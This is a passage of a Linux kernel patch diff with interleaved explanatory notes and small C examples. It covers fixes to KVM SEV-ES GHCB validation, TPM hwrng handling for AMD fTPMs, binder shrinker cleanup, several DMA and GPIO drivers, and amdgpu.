+@@ -2457,56 +2467,56 @@ static int sev_es_validate_vmgexit(struct vcpu_svm *svm)
+ 
+ 	reason = GHCB_ERR_MISSING_INPUT;
+ 
+-	if (!ghcb_sw_exit_code_is_valid(ghcb) ||
+-	    !ghcb_sw_exit_info_1_is_valid(ghcb) ||
+-	    !ghcb_sw_exit_info_2_is_valid(ghcb))
++	if (!kvm_ghcb_sw_exit_code_is_valid(svm) ||
++	    !kvm_ghcb_sw_exit_info_1_is_valid(svm) ||
++	    !kvm_ghcb_sw_exit_info_2_is_valid(svm))
+ 		goto vmgexit_err;
+ 
+-	switch (ghcb_get_sw_exit_code(ghcb)) {
++	switch (exit_code) {
+ 	case SVM_EXIT_READ_DR7:
+ 		break;
+ 	case SVM_EXIT_WRITE_DR7:
+-		if (!ghcb_rax_is_valid(ghcb))
++		if (!kvm_ghcb_rax_is_valid(svm))
+ 			goto vmgexit_err;
+ 		break;
+ 	case SVM_EXIT_RDTSC:
+ 		break;
+ 	case SVM_EXIT_RDPMC:
+-		if (!ghcb_rcx_is_valid(ghcb))
++		if (!kvm_ghcb_rcx_is_valid(svm))
+ 			goto vmgexit_err;
+ 		break;
+ 	case SVM_EXIT_CPUID:
+-		if (!ghcb_rax_is_valid(ghcb) ||
+-		    !ghcb_rcx_is_valid(ghcb))
++		if (!kvm_ghcb_rax_is_valid(svm) ||
++		    !kvm_ghcb_rcx_is_valid(svm))
+ 			goto vmgexit_err;
+-		if (ghcb_get_rax(ghcb) == 0xd)
+-			if (!ghcb_xcr0_is_valid(ghcb))
++		if (vcpu->arch.regs[VCPU_REGS_RAX] == 0xd)
++			if (!kvm_ghcb_xcr0_is_valid(svm))
+ 				goto vmgexit_err;
+ 		break;
+ 	case SVM_EXIT_INVD:
+ 		break;
+ 	case SVM_EXIT_IOIO:
+-		if (ghcb_get_sw_exit_info_1(ghcb) & SVM_IOIO_STR_MASK) {
+-			if (!ghcb_sw_scratch_is_valid(ghcb))
++		if (control->exit_info_1 & SVM_IOIO_STR_MASK) {
++			if (!kvm_ghcb_sw_scratch_is_valid(svm))
+ 				goto vmgexit_err;
+ 		} else {
+-			if (!(ghcb_get_sw_exit_info_1(ghcb) & SVM_IOIO_TYPE_MASK))
+-				if (!ghcb_rax_is_valid(ghcb))
++			if (!(control->exit_info_1 & SVM_IOIO_TYPE_MASK))
++				if (!kvm_ghcb_rax_is_valid(svm))
+ 					goto vmgexit_err;
+ 		}
+ 		break;
+ 	case SVM_EXIT_MSR:
+-		if (!ghcb_rcx_is_valid(ghcb))
++		if (!kvm_ghcb_rcx_is_valid(svm))
+ 			goto vmgexit_err;
+-		if (ghcb_get_sw_exit_info_1(ghcb)) {
+-			if (!ghcb_rax_is_valid(ghcb) ||
+-			    !ghcb_rdx_is_valid(ghcb))
++		if (control->exit_info_1) {
++			if (!kvm_ghcb_rax_is_valid(svm) ||
++			    !kvm_ghcb_rdx_is_valid(svm))
+ 				goto vmgexit_err;
+ 		}
+ 		break;
+ 	case SVM_EXIT_VMMCALL:
+-		if (!ghcb_rax_is_valid(ghcb) ||
+-		    !ghcb_cpl_is_valid(ghcb))
++		if (!kvm_ghcb_rax_is_valid(svm) ||
++		    !kvm_ghcb_cpl_is_valid(svm))
+ 			goto vmgexit_err;
+ 		break;
+ 	case SVM_EXIT_RDTSCP:
+@@ -2514,19 +2524,19 @@ static int sev_es_validate_vmgexit(struct vcpu_svm *svm)
+ 	case SVM_EXIT_WBINVD:
+ 		break;
+ 	case SVM_EXIT_MONITOR:
+-		if (!ghcb_rax_is_valid(ghcb) ||
+-		    !ghcb_rcx_is_valid(ghcb) ||
+-		    !ghcb_rdx_is_valid(ghcb))
++		if (!kvm_ghcb_rax_is_valid(svm) ||
++		    !kvm_ghcb_rcx_is_valid(svm) ||
++		    !kvm_ghcb_rdx_is_valid(svm))
+ 			goto vmgexit_err;
+ 		break;
+ 	case SVM_EXIT_MWAIT:
+-		if (!ghcb_rax_is_valid(ghcb) ||
+-		    !ghcb_rcx_is_valid(ghcb))
++		if (!kvm_ghcb_rax_is_valid(svm) ||
++		    !kvm_ghcb_rcx_is_valid(svm))
+ 			goto vmgexit_err;
+ 		break;
+ 	case SVM_VMGEXIT_MMIO_READ:
+ 	case SVM_VMGEXIT_MMIO_WRITE:
+-		if (!ghcb_sw_scratch_is_valid(ghcb))
++		if (!kvm_ghcb_sw_scratch_is_valid(svm))
+ 			goto vmgexit_err;
+ 		break;
+ 	case SVM_VMGEXIT_NMI_COMPLETE:
+@@ -2542,8 +2552,6 @@ static int sev_es_validate_vmgexit(struct vcpu_svm *svm)
+ 	return 0;
+ 
+ vmgexit_err:
+-	vcpu = &svm->vcpu;
+-
+ 	if (reason == GHCB_ERR_INVALID_USAGE) {
+ 		vcpu_unimpl(vcpu, "vmgexit: ghcb usage %#x is not valid\n",
+ 			    ghcb->ghcb_usage);
+@@ -2556,9 +2564,6 @@ vmgexit_err:
+ 		dump_ghcb(svm);
+ 	}
+ 
+-	/* Clear the valid entries fields */
+-	memset(ghcb->save.valid_bitmap, 0, sizeof(ghcb->save.valid_bitmap));
+-
+ 	ghcb_set_sw_exit_info_1(ghcb, 2);
+ 	ghcb_set_sw_exit_info_2(ghcb, reason);
+ 
+@@ -2579,7 +2584,7 @@ void sev_es_unmap_ghcb(struct vcpu_svm *svm)
+ 		 */
+ 		if (svm->sev_es.ghcb_sa_sync) {
+ 			kvm_write_guest(svm->vcpu.kvm,
+-					ghcb_get_sw_scratch(svm->sev_es.ghcb),
++					svm->sev_es.sw_scratch,
+ 					svm->sev_es.ghcb_sa,
+ 					svm->sev_es.ghcb_sa_len);
+ 			svm->sev_es.ghcb_sa_sync = false;
+@@ -2630,7 +2635,7 @@ static int setup_vmgexit_scratch(struct vcpu_svm *svm, bool sync, u64 len)
+ 	u64 scratch_gpa_beg, scratch_gpa_end;
+ 	void *scratch_va;
+ 
+-	scratch_gpa_beg = ghcb_get_sw_scratch(ghcb);
++	scratch_gpa_beg = svm->sev_es.sw_scratch;
+ 	if (!scratch_gpa_beg) {
+ 		pr_err("vmgexit: scratch gpa not provided\n");
+ 		goto e_scratch;
+@@ -2844,16 +2849,15 @@ int sev_handle_vmgexit(struct kvm_vcpu *vcpu)
+ 
+ 	trace_kvm_vmgexit_enter(vcpu->vcpu_id, ghcb);
+ 
+-	exit_code = ghcb_get_sw_exit_code(ghcb);
+-
++	sev_es_sync_from_ghcb(svm);
+ 	ret = sev_es_validate_vmgexit(svm);
+ 	if (ret)
+ 		return ret;
+ 
+-	sev_es_sync_from_ghcb(svm);
+ 	ghcb_set_sw_exit_info_1(ghcb, 0);
+ 	ghcb_set_sw_exit_info_2(ghcb, 0);
+ 
++	exit_code = kvm_ghcb_get_sw_exit_code(control);
+ 	switch (exit_code) {
+ 	case SVM_VMGEXIT_MMIO_READ:
+ 		ret = setup_vmgexit_scratch(svm, true, control->exit_info_2);
+diff --git a/arch/x86/kvm/svm/svm.h b/arch/x86/kvm/svm/svm.h
+index d0ed3f5952295..62f87492763e0 100644
+--- a/arch/x86/kvm/svm/svm.h
++++ b/arch/x86/kvm/svm/svm.h
+@@ -196,10 +196,12 @@ struct vcpu_sev_es_state {
+ 	/* SEV-ES support */
+ 	struct sev_es_save_area *vmsa;
+ 	struct ghcb *ghcb;
++	u8 valid_bitmap[16];
+ 	struct kvm_host_map ghcb_map;
+ 	bool received_first_sipi;
+ 
+ 	/* SEV-ES scratch area support */
++	u64 sw_scratch;
+ 	void *ghcb_sa;
+ 	u32 ghcb_sa_len;
+ 	bool ghcb_sa_sync;
+@@ -688,4 +690,28 @@ void sev_es_unmap_ghcb(struct vcpu_svm *svm);
+ void __svm_sev_es_vcpu_run(struct vcpu_svm *svm, bool spec_ctrl_intercepted);
+ void __svm_vcpu_run(struct vcpu_svm *svm, bool spec_ctrl_intercepted);
+ 
++#define DEFINE_KVM_GHCB_ACCESSORS(field)						\
++	static __always_inline bool kvm_ghcb_##field##_is_valid(const struct vcpu_svm *svm) \
++	{									\
++		return test_bit(GHCB_BITMAP_IDX(field),				\
++				(unsigned long *)&svm->sev_es.valid_bitmap);	\
++	}									\
++										\
++	static __always_inline u64 kvm_ghcb_get_##field##_if_valid(struct vcpu_svm *svm, struct ghcb *ghcb) \
++	{									\
++		return kvm_ghcb_##field##_is_valid(svm) ? ghcb->save.field : 0;	\
++	}									\
++
++DEFINE_KVM_GHCB_ACCESSORS(cpl)
++DEFINE_KVM_GHCB_ACCESSORS(rax)
++DEFINE_KVM_GHCB_ACCESSORS(rcx)
++DEFINE_KVM_GHCB_ACCESSORS(rdx)
++DEFINE_KVM_GHCB_ACCESSORS(rbx)
++DEFINE_KVM_GHCB_ACCESSORS(rsi)
++DEFINE_KVM_GHCB_ACCESSORS(sw_exit_code)
++DEFINE_KVM_GHCB_ACCESSORS(sw_exit_info_1)
++DEFINE_KVM_GHCB_ACCESSORS(sw_exit_info_2)
++DEFINE_KVM_GHCB_ACCESSORS(sw_scratch)
++DEFINE_KVM_GHCB_ACCESSORS(xcr0)
++
+ #endif
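
DEFINE_KVM_GHCB_ACCESSORS stamps out an _is_valid/_get_if_valid pair per GHCB field from one template, with validity read from KVM's own snapshot of the bitmap instead of the guest-writable GHCB page. The macro pattern reduced to a compilable toy (GHCB_BITMAP_IDX and the field set are stand-ins):

    #include <stdint.h>
    #include <stdio.h>

    struct save { uint64_t rax, rcx; };
    struct vcpu { uint64_t valid_bitmap; struct save save; };

    /* Stand-in for GHCB_BITMAP_IDX(field). */
    #define IDX_rax 0
    #define IDX_rcx 1

    #define DEFINE_ACCESSORS(field)                                       \
        static int field##_is_valid(const struct vcpu *v)                 \
        {                                                                 \
            return (v->valid_bitmap >> IDX_##field) & 1;                  \
        }                                                                 \
        static uint64_t get_##field##_if_valid(const struct vcpu *v)      \
        {                                                                 \
            return field##_is_valid(v) ? v->save.field : 0;               \
        }

    DEFINE_ACCESSORS(rax)
    DEFINE_ACCESSORS(rcx)

    int main(void)
    {
        struct vcpu v = { .valid_bitmap = 1 << IDX_rax,
                          .save = { .rax = 0xd, .rcx = 99 } };

        /* rcx was never marked valid, so its accessor yields 0. */
        printf("rax=%llu rcx=%llu\n",
               (unsigned long long)get_rax_if_valid(&v),
               (unsigned long long)get_rcx_if_valid(&v));
        return 0;
    }
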
+diff --git a/arch/x86/kvm/x86.c b/arch/x86/kvm/x86.c
+index f4b12c3c30a01..1931d3fcbbe09 100644
+--- a/arch/x86/kvm/x86.c
++++ b/arch/x86/kvm/x86.c
+@@ -311,8 +311,6 @@ u64 __read_mostly host_xcr0;
+ 
+ static struct kmem_cache *x86_emulator_cache;
+ 
+-extern bool gds_ucode_mitigated(void);
+-
+ /*
+  * When called, it means the previous get/set msr reached an invalid msr.
+  * Return true if we want to ignore/silent this failed msr access.
+diff --git a/drivers/acpi/scan.c b/drivers/acpi/scan.c
+index dbfa58e799e28..a0e347f6f97eb 100644
+--- a/drivers/acpi/scan.c
++++ b/drivers/acpi/scan.c
+@@ -1712,6 +1712,7 @@ static bool acpi_device_enumeration_by_parent(struct acpi_device *device)
+ 		{"BSG1160", },
+ 		{"BSG2150", },
+ 		{"CSC3551", },
++		{"CSC3556", },
+ 		{"INT33FE", },
+ 		{"INT3515", },
+ 		/* Non-conforming _HID for Cirrus Logic already released */
+diff --git a/drivers/android/binder.c b/drivers/android/binder.c
+index e374a8a2da46e..e4a6da81cd4b3 100644
+--- a/drivers/android/binder.c
++++ b/drivers/android/binder.c
+@@ -6602,6 +6602,7 @@ err_init_binder_device_failed:
+ 
+ err_alloc_device_names_failed:
+ 	debugfs_remove_recursive(binder_debugfs_dir_entry_root);
++	binder_alloc_shrinker_exit();
+ 
+ 	return ret;
+ }
+diff --git a/drivers/android/binder_alloc.c b/drivers/android/binder_alloc.c
+index 4fb89ef067d57..cd87f12733f27 100644
+--- a/drivers/android/binder_alloc.c
++++ b/drivers/android/binder_alloc.c
+@@ -1087,6 +1087,12 @@ int binder_alloc_shrinker_init(void)
+ 	return ret;
+ }
+ 
++void binder_alloc_shrinker_exit(void)
++{
++	unregister_shrinker(&binder_shrinker);
++	list_lru_destroy(&binder_alloc_lru);
++}
++
+ /**
+  * check_buffer() - verify that buffer/offset is safe to access
+  * @alloc: binder_alloc for this proc
+diff --git a/drivers/android/binder_alloc.h b/drivers/android/binder_alloc.h
+index 138d1d5af9ce3..dc1e2b01dd64d 100644
+--- a/drivers/android/binder_alloc.h
++++ b/drivers/android/binder_alloc.h
+@@ -129,6 +129,7 @@ extern struct binder_buffer *binder_alloc_new_buf(struct binder_alloc *alloc,
+ 						  int pid);
+ extern void binder_alloc_init(struct binder_alloc *alloc);
+ extern int binder_alloc_shrinker_init(void);
++extern void binder_alloc_shrinker_exit(void);
+ extern void binder_alloc_vma_close(struct binder_alloc *alloc);
+ extern struct binder_buffer *
+ binder_alloc_prepare_to_free(struct binder_alloc *alloc,
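
binder_alloc_shrinker_exit() exists so the init error path can unwind: once a shrinker is registered, any later failure in binder_init() must unregister it, or the kernel keeps calling into freed module state. The general shape of paired setup with goto-style unwinding, simulated in userspace:

    #include <stdio.h>

    static int  register_shrinker(void)   { puts("shrinker registered");   return 0; }
    static void unregister_shrinker(void) { puts("shrinker unregistered"); }
    static int  create_devices(void)      { return -1; /* simulate failure */ }

    static int module_init_fn(void)
    {
        int ret = register_shrinker();
        if (ret)
            return ret;

        ret = create_devices();
        if (ret)
            goto err_devices;

        return 0;

    err_devices:
        /* Undo everything set up before the failure point. */
        unregister_shrinker();
        return ret;
    }

    int main(void)
    {
        return module_init_fn() ? 1 : 0;
    }
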
+diff --git a/drivers/char/tpm/tpm-chip.c b/drivers/char/tpm/tpm-chip.c
+index d7ef4d0a7409f..c0759d49fd145 100644
+--- a/drivers/char/tpm/tpm-chip.c
++++ b/drivers/char/tpm/tpm-chip.c
+@@ -507,70 +507,6 @@ static int tpm_add_legacy_sysfs(struct tpm_chip *chip)
+ 	return 0;
+ }
+ 
+-/*
+- * Some AMD fTPM versions may cause stutter
+- * https://www.amd.com/en/support/kb/faq/pa-410
+- *
+- * Fixes are available in two series of fTPM firmware:
+- * 6.x.y.z series: 6.0.18.6 +
+- * 3.x.y.z series: 3.57.y.5 +
+- */
+-#ifdef CONFIG_X86
+-static bool tpm_amd_is_rng_defective(struct tpm_chip *chip)
+-{
+-	u32 val1, val2;
+-	u64 version;
+-	int ret;
+-
+-	if (!(chip->flags & TPM_CHIP_FLAG_TPM2))
+-		return false;
+-
+-	ret = tpm_request_locality(chip);
+-	if (ret)
+-		return false;
+-
+-	ret = tpm2_get_tpm_pt(chip, TPM2_PT_MANUFACTURER, &val1, NULL);
+-	if (ret)
+-		goto release;
+-	if (val1 != 0x414D4400U /* AMD */) {
+-		ret = -ENODEV;
+-		goto release;
+-	}
+-	ret = tpm2_get_tpm_pt(chip, TPM2_PT_FIRMWARE_VERSION_1, &val1, NULL);
+-	if (ret)
+-		goto release;
+-	ret = tpm2_get_tpm_pt(chip, TPM2_PT_FIRMWARE_VERSION_2, &val2, NULL);
+-
+-release:
+-	tpm_relinquish_locality(chip);
+-
+-	if (ret)
+-		return false;
+-
+-	version = ((u64)val1 << 32) | val2;
+-	if ((version >> 48) == 6) {
+-		if (version >= 0x0006000000180006ULL)
+-			return false;
+-	} else if ((version >> 48) == 3) {
+-		if (version >= 0x0003005700000005ULL)
+-			return false;
+-	} else {
+-		return false;
+-	}
+-
+-	dev_warn(&chip->dev,
+-		 "AMD fTPM version 0x%llx causes system stutter; hwrng disabled\n",
+-		 version);
+-
+-	return true;
+-}
+-#else
+-static inline bool tpm_amd_is_rng_defective(struct tpm_chip *chip)
+-{
+-	return false;
+-}
+-#endif /* CONFIG_X86 */
+-
+ static int tpm_hwrng_read(struct hwrng *rng, void *data, size_t max, bool wait)
+ {
+ 	struct tpm_chip *chip = container_of(rng, struct tpm_chip, hwrng);
+@@ -582,10 +518,20 @@ static int tpm_hwrng_read(struct hwrng *rng, void *data, size_t max, bool wait)
+ 	return tpm_get_random(chip, data, max);
+ }
+ 
++static bool tpm_is_hwrng_enabled(struct tpm_chip *chip)
++{
++	if (!IS_ENABLED(CONFIG_HW_RANDOM_TPM))
++		return false;
++	if (tpm_is_firmware_upgrade(chip))
++		return false;
++	if (chip->flags & TPM_CHIP_FLAG_HWRNG_DISABLED)
++		return false;
++	return true;
++}
++
+ static int tpm_add_hwrng(struct tpm_chip *chip)
+ {
+-	if (!IS_ENABLED(CONFIG_HW_RANDOM_TPM) || tpm_is_firmware_upgrade(chip) ||
+-	    tpm_amd_is_rng_defective(chip))
++	if (!tpm_is_hwrng_enabled(chip))
+ 		return 0;
+ 
+ 	snprintf(chip->hwrng_name, sizeof(chip->hwrng_name),
+@@ -690,7 +636,7 @@ int tpm_chip_register(struct tpm_chip *chip)
+ 	return 0;
+ 
+ out_hwrng:
+-	if (IS_ENABLED(CONFIG_HW_RANDOM_TPM) && !tpm_is_firmware_upgrade(chip))
++	if (tpm_is_hwrng_enabled(chip))
+ 		hwrng_unregister(&chip->hwrng);
+ out_ppi:
+ 	tpm_bios_log_teardown(chip);
+@@ -715,8 +661,7 @@ EXPORT_SYMBOL_GPL(tpm_chip_register);
+ void tpm_chip_unregister(struct tpm_chip *chip)
+ {
+ 	tpm_del_legacy_sysfs(chip);
+-	if (IS_ENABLED(CONFIG_HW_RANDOM_TPM) && !tpm_is_firmware_upgrade(chip) &&
+-	    !tpm_amd_is_rng_defective(chip))
++	if (tpm_is_hwrng_enabled(chip))
+ 		hwrng_unregister(&chip->hwrng);
+ 	tpm_bios_log_teardown(chip);
+ 	if (chip->flags & TPM_CHIP_FLAG_TPM2 && !tpm_is_firmware_upgrade(chip))
+diff --git a/drivers/char/tpm/tpm_crb.c b/drivers/char/tpm/tpm_crb.c
+index cbbedf52607c0..7f7f3bded4535 100644
+--- a/drivers/char/tpm/tpm_crb.c
++++ b/drivers/char/tpm/tpm_crb.c
+@@ -463,6 +463,28 @@ static bool crb_req_canceled(struct tpm_chip *chip, u8 status)
+ 	return (cancel & CRB_CANCEL_INVOKE) == CRB_CANCEL_INVOKE;
+ }
+ 
++static int crb_check_flags(struct tpm_chip *chip)
++{
++	u32 val;
++	int ret;
++
++	ret = crb_request_locality(chip, 0);
++	if (ret)
++		return ret;
++
++	ret = tpm2_get_tpm_pt(chip, TPM2_PT_MANUFACTURER, &val, NULL);
++	if (ret)
++		goto release;
++
++	if (val == 0x414D4400U /* AMD */)
++		chip->flags |= TPM_CHIP_FLAG_HWRNG_DISABLED;
++
++release:
++	crb_relinquish_locality(chip, 0);
++
++	return ret;
++}
++
+ static const struct tpm_class_ops tpm_crb = {
+ 	.flags = TPM_OPS_AUTO_STARTUP,
+ 	.status = crb_status,
+@@ -800,6 +822,14 @@ static int crb_acpi_add(struct acpi_device *device)
+ 	chip->acpi_dev_handle = device->handle;
+ 	chip->flags = TPM_CHIP_FLAG_TPM2;
+ 
++	rc = tpm_chip_bootstrap(chip);
++	if (rc)
++		goto out;
++
++	rc = crb_check_flags(chip);
++	if (rc)
++		goto out;
++
+ 	rc = tpm_chip_register(chip);
+ 
+ out:
+diff --git a/drivers/cpuidle/dt_idle_genpd.c b/drivers/cpuidle/dt_idle_genpd.c
+index b37165514d4e7..1af63c189039e 100644
+--- a/drivers/cpuidle/dt_idle_genpd.c
++++ b/drivers/cpuidle/dt_idle_genpd.c
+@@ -152,6 +152,30 @@ int dt_idle_pd_init_topology(struct device_node *np)
+ 	return 0;
+ }
+ 
++int dt_idle_pd_remove_topology(struct device_node *np)
++{
++	struct device_node *node;
++	struct of_phandle_args child, parent;
++	int ret;
++
++	for_each_child_of_node(np, node) {
++		if (of_parse_phandle_with_args(node, "power-domains",
++					"#power-domain-cells", 0, &parent))
++			continue;
++
++		child.np = node;
++		child.args_count = 0;
++		ret = of_genpd_remove_subdomain(&parent, &child);
++		of_node_put(parent.np);
++		if (ret) {
++			of_node_put(node);
++			return ret;
++		}
++	}
++
++	return 0;
++}
++
+ struct device *dt_idle_attach_cpu(int cpu, const char *name)
+ {
+ 	struct device *dev;
+diff --git a/drivers/cpuidle/dt_idle_genpd.h b/drivers/cpuidle/dt_idle_genpd.h
+index a95483d08a02a..3be1f70f55b5c 100644
+--- a/drivers/cpuidle/dt_idle_genpd.h
++++ b/drivers/cpuidle/dt_idle_genpd.h
+@@ -14,6 +14,8 @@ struct generic_pm_domain *dt_idle_pd_alloc(struct device_node *np,
+ 
+ int dt_idle_pd_init_topology(struct device_node *np);
+ 
++int dt_idle_pd_remove_topology(struct device_node *np);
++
+ struct device *dt_idle_attach_cpu(int cpu, const char *name);
+ 
+ void dt_idle_detach_cpu(struct device *dev);
+@@ -36,6 +38,11 @@ static inline int dt_idle_pd_init_topology(struct device_node *np)
+ 	return 0;
+ }
+ 
++static inline int dt_idle_pd_remove_topology(struct device_node *np)
++{
++	return 0;
++}
++
+ static inline struct device *dt_idle_attach_cpu(int cpu, const char *name)
+ {
+ 	return NULL;
+diff --git a/drivers/dma/mcf-edma.c b/drivers/dma/mcf-edma.c
+index e12b754e6398d..60d3c5f09ad67 100644
+--- a/drivers/dma/mcf-edma.c
++++ b/drivers/dma/mcf-edma.c
+@@ -191,7 +191,13 @@ static int mcf_edma_probe(struct platform_device *pdev)
+ 		return -EINVAL;
+ 	}
+ 
+-	chans = pdata->dma_channels;
++	if (!pdata->dma_channels) {
++		dev_info(&pdev->dev, "setting default channel number to 64");
++		chans = 64;
++	} else {
++		chans = pdata->dma_channels;
++	}
++
+ 	len = sizeof(*mcf_edma) + sizeof(*mcf_chan) * chans;
+ 	mcf_edma = devm_kzalloc(&pdev->dev, len, GFP_KERNEL);
+ 	if (!mcf_edma)
+@@ -203,11 +209,6 @@ static int mcf_edma_probe(struct platform_device *pdev)
+ 	mcf_edma->drvdata = &mcf_data;
+ 	mcf_edma->big_endian = 1;
+ 
+-	if (!mcf_edma->n_chans) {
+-		dev_info(&pdev->dev, "setting default channel number to 64");
+-		mcf_edma->n_chans = 64;
+-	}
+-
+ 	mutex_init(&mcf_edma->fsl_edma_mutex);
+ 
+ 	res = platform_get_resource(pdev, IORESOURCE_MEM, 0);
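
The point of the mcf-edma hunk is ordering rather than the value itself: the devm_kzalloc() length was previously computed from pdata->dma_channels before the n_chans = 64 fallback ran, so a zero channel count in the platform data undersized the per-channel array that the default then indexed. Condensed, the fixed flow is:

/* the channel count must be final before it sizes the allocation */
chans = pdata->dma_channels ?: 64;
len = sizeof(*mcf_edma) + sizeof(*mcf_chan) * chans;
mcf_edma = devm_kzalloc(&pdev->dev, len, GFP_KERNEL);
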
+diff --git a/drivers/dma/owl-dma.c b/drivers/dma/owl-dma.c
+index 95a462a1f5111..b6e0ac8314e5c 100644
+--- a/drivers/dma/owl-dma.c
++++ b/drivers/dma/owl-dma.c
+@@ -192,7 +192,7 @@ struct owl_dma_pchan {
+ };
+ 
+ /**
+- * struct owl_dma_pchan - Wrapper for DMA ENGINE channel
++ * struct owl_dma_vchan - Wrapper for DMA ENGINE channel
+  * @vc: wrapped virtual channel
+  * @pchan: the physical channel utilized by this channel
+  * @txd: active transaction on this channel
+diff --git a/drivers/dma/pl330.c b/drivers/dma/pl330.c
+index b4731fe6bbc14..3cf0b38387ae5 100644
+--- a/drivers/dma/pl330.c
++++ b/drivers/dma/pl330.c
+@@ -403,6 +403,12 @@ enum desc_status {
+ 	 * of a channel can be BUSY at any time.
+ 	 */
+ 	BUSY,
++	/*
++	 * Pause was called while descriptor was BUSY. Due to hardware
++	 * limitations, only termination is possible for descriptors
++	 * that have been paused.
++	 */
++	PAUSED,
+ 	/*
+ 	 * Sitting on the channel work_list but xfer done
+ 	 * by PL330 core
+@@ -2041,7 +2047,7 @@ static inline void fill_queue(struct dma_pl330_chan *pch)
+ 	list_for_each_entry(desc, &pch->work_list, node) {
+ 
+ 		/* If already submitted */
+-		if (desc->status == BUSY)
++		if (desc->status == BUSY || desc->status == PAUSED)
+ 			continue;
+ 
+ 		ret = pl330_submit_req(pch->thread, desc);
+@@ -2326,6 +2332,7 @@ static int pl330_pause(struct dma_chan *chan)
+ {
+ 	struct dma_pl330_chan *pch = to_pchan(chan);
+ 	struct pl330_dmac *pl330 = pch->dmac;
++	struct dma_pl330_desc *desc;
+ 	unsigned long flags;
+ 
+ 	pm_runtime_get_sync(pl330->ddma.dev);
+@@ -2335,6 +2342,10 @@ static int pl330_pause(struct dma_chan *chan)
+ 	_stop(pch->thread);
+ 	spin_unlock(&pl330->lock);
+ 
++	list_for_each_entry(desc, &pch->work_list, node) {
++		if (desc->status == BUSY)
++			desc->status = PAUSED;
++	}
+ 	spin_unlock_irqrestore(&pch->lock, flags);
+ 	pm_runtime_mark_last_busy(pl330->ddma.dev);
+ 	pm_runtime_put_autosuspend(pl330->ddma.dev);
+@@ -2425,7 +2436,7 @@ pl330_tx_status(struct dma_chan *chan, dma_cookie_t cookie,
+ 		else if (running && desc == running)
+ 			transferred =
+ 				pl330_get_current_xferred_count(pch, desc);
+-		else if (desc->status == BUSY)
++		else if (desc->status == BUSY || desc->status == PAUSED)
+ 			/*
+ 			 * Busy but not running means either just enqueued,
+ 			 * or finished and not yet marked done
+@@ -2442,6 +2453,9 @@ pl330_tx_status(struct dma_chan *chan, dma_cookie_t cookie,
+ 			case DONE:
+ 				ret = DMA_COMPLETE;
+ 				break;
++			case PAUSED:
++				ret = DMA_PAUSED;
++				break;
+ 			case PREP:
+ 			case BUSY:
+ 				ret = DMA_IN_PROGRESS;
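
For a dmaengine consumer, the new PAUSED state means a paused PL330 channel reports DMA_PAUSED from tx_status and, per the hardware limitation noted above, can only be terminated, never resumed mid-descriptor. A sketch using the generic dmaengine API (consumer code assumed, not part of this patch):

struct dma_tx_state state;
enum dma_status status;

dmaengine_pause(chan);
status = dmaengine_tx_status(chan, cookie, &state);
if (status == DMA_PAUSED) {
	/* the residue in state is stable now; the only way forward on
	 * PL330 is to terminate the channel
	 */
	dmaengine_terminate_sync(chan);
}
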
+diff --git a/drivers/gpio/gpio-sim.c b/drivers/gpio/gpio-sim.c
+index 803676e307d73..fef12e57b1f13 100644
+--- a/drivers/gpio/gpio-sim.c
++++ b/drivers/gpio/gpio-sim.c
+@@ -425,6 +425,7 @@ static int gpio_sim_add_bank(struct fwnode_handle *swnode, struct device *dev)
+ 	gc->set_config = gpio_sim_set_config;
+ 	gc->to_irq = gpio_sim_to_irq;
+ 	gc->free = gpio_sim_free;
++	gc->can_sleep = true;
+ 
+ 	ret = devm_gpiochip_add_data(dev, gc, chip);
+ 	if (ret)
+diff --git a/drivers/gpio/gpio-ws16c48.c b/drivers/gpio/gpio-ws16c48.c
+index e73885a4dc328..afb42a8e916fe 100644
+--- a/drivers/gpio/gpio-ws16c48.c
++++ b/drivers/gpio/gpio-ws16c48.c
+@@ -18,7 +18,7 @@
+ #include <linux/spinlock.h>
+ #include <linux/types.h>
+ 
+-#define WS16C48_EXTENT 10
++#define WS16C48_EXTENT 11
+ #define MAX_NUM_WS16C48 max_num_isa_dev(WS16C48_EXTENT)
+ 
+ static unsigned int base[MAX_NUM_WS16C48];
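
The extent bump is an off-by-one fix in plain arithmetic: per the upstream fix this backports, the WS16C48 register map spans offsets 0x0 through 0xA, and a region covering offsets 0 through 10 inclusive is 0xA + 1 = 11 ports wide, so requesting only 10 ports left the last register outside the claimed I/O region.
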
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu.h b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+index c0e782a95e72e..0c962f996aff5 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu.h
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+@@ -242,6 +242,7 @@ extern int amdgpu_num_kcq;
+ 
+ #define AMDGPU_VCNFW_LOG_SIZE (32 * 1024)
+ extern int amdgpu_vcnfw_log;
++extern int amdgpu_sg_display;
+ 
+ #define AMDGPU_VM_MAX_NUM_CTX			4096
+ #define AMDGPU_SG_THRESHOLD			(256*1024*1024)
+@@ -283,6 +284,9 @@ extern int amdgpu_vcnfw_log;
+ #define AMDGPU_SMARTSHIFT_MAX_BIAS (100)
+ #define AMDGPU_SMARTSHIFT_MIN_BIAS (-100)
+ 
++/* Extra time delay (in ms) to eliminate the influence of momentary temperature fluctuations */
++#define AMDGPU_SWCTF_EXTRA_DELAY		50
++
+ struct amdgpu_device;
+ struct amdgpu_irq_src;
+ struct amdgpu_fpriv;
+@@ -1262,6 +1266,7 @@ int amdgpu_device_gpu_recover(struct amdgpu_device *adev,
+ void amdgpu_device_pci_config_reset(struct amdgpu_device *adev);
+ int amdgpu_device_pci_reset(struct amdgpu_device *adev);
+ bool amdgpu_device_need_post(struct amdgpu_device *adev);
++bool amdgpu_sg_display_supported(struct amdgpu_device *adev);
+ bool amdgpu_device_pcie_dynamic_switching_supported(void);
+ bool amdgpu_device_should_use_aspm(struct amdgpu_device *adev);
+ bool amdgpu_device_aspm_support_quirk(void);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
+index b60b6e6149bf7..fdb53d4394f30 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
+@@ -287,7 +287,7 @@ static int amdgpu_cs_pass1(struct amdgpu_cs_parser *p,
+ 
+ 	if (!p->gang_size) {
+ 		ret = -EINVAL;
+-		goto free_partial_kdata;
++		goto free_all_kdata;
+ 	}
+ 
+ 	for (i = 0; i < p->gang_size; ++i) {
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index 30c97ee375636..773383e660e8c 100644
